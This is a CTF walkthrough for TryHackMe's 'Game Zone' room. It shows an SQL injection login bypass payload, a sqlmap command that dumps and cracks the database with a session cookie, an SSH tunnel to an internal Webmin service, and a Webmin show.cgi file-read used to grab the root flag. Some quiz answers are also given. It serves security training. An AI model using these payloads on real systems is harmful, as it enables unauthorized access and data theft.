A room in TryHackMe’s OSCP path. Make sure to check out TryHackMe!
Game Zone Writeup
[Task 1] Deploy the vulnerable machine
Deploy the machine. Open the IP address in your web browser to see the Game Zone forum. The picture in the background is Agent 47, from the Hitman series. If you didn’t know that from the top of your head, you could try reverse image searching that image.
Question: What is the name of the large cartoon avatar holding a sniper on the forum?
Answer: Agent 47
[Task 2] Gain Access
For this task, you need to exploit the login field by using SQLi, or SQL injection. Input
' or 1=1 -- - as the username, and leave the password blank to bypass the login field. You’ll get navigated to
Question: When you’ve logged in, what page do you get redirected to?
[Task 3] Using SQLMap
Now, we will use SQLMap to exfiltrate date from the Game Zone Portal. The room suggests using Burp Suite, but it can be faster to skip using this tool.
We want to use SQLMap to bruteforce SQL injection in
portal.php, but to access this file you need to be logged in. Since you are already logged in, grab your
PHPSESSID cookie (either from browser info or
Now that we know the cookie, we need to know what field to try SQL injection on. Open the source of the page, and you’ll see
<input type="text" id="searchitem" name="searchitem">. This means that there is a form field named
searchitem which can be tested for SQLi.
Run the command
sqlmap -u "http://<IP>/portal.php" --cookie="PHPSESSID=<COOKIE>" --data="searchitem=" --dump to scan for SQLi on
portal.php with your cookie on the
searchitem field. It’ll also attempt to dump the whole database to a file. Run this command, and when it asks if you want to crack password, hit yes, and point it to a password wordlist (like
Let it run, and when it’s done, you’ll have a dump of the database and the login for a user! Check out the directory where SQLMap outputted all of its data. It should be at
~/.sqlmap/output/<IP>. Here, if you check out the
log file, you’ll find the other table name.
Question: In the users table, what is the hashed password?
Question: What was the username associated with the hashed password?
Question: What was the other table name?
[Task 4] Cracking a password with JohnTheRipper
Well, if you did what I did last task, you don’t need to use JohnTheRipper. You know the password, and use it to SSH into the box and read the user flag.
Question: What is the de-hashed password?
video...Question: What is the user flag?
[Task 5] Exposing services with reverse SSH tunnels
ss -tulpn to see all of the socket connections, and you’ll see there are 5 TCP sockets running. One of the running sockets is running on the port
10000, and we can try checking out what it is using
curl localhost:10000 on the gamezone box, and you’ll see it’s a website! However, navigating to
<IP>:10000 in your browser doesn’t work, which means the box is not accepting outside connections to that port.
We can bypass this by using an SSH tunnel. Run the command
ssh -L 10000:localhost:10000 [email protected]<gamezone_ip> on your box. This command will use SSH to tunnel the socket on port 10000 to run on localhost:10000. Now, if you open up
localhost:10000 on your browser, a login field should appear! It asks for a username and password, so plug in the login details you already know.
Question: How any TCP sockets are running?
Answer: 5 Question: What is the name of the exposed CMS?
Answer: Webmin Question: What is the CMS version?
[Task 6] Privilege Escalation with Metasploit
Rather than using Metasploit directly, let’s see if we can use it to figure out how to exploit the box. Running
msfconsole and running
search webmin brings up many exploits.
exploits/unix/webapp/webmin_show_cgi_exec seemed interesting to me, so I searched for it and found this link on GitHub.
Looking through the code, I see a reference to
/file/show.cgi/, and a file path being placed right after. It seems to be a script that will read out the contents of any file, so let’s use it to get the flag. Navigating to
localhost:10000/file/show.cgi/root/root.txt prints out the flag, all without using Metasploit.
Question: What is the root flag?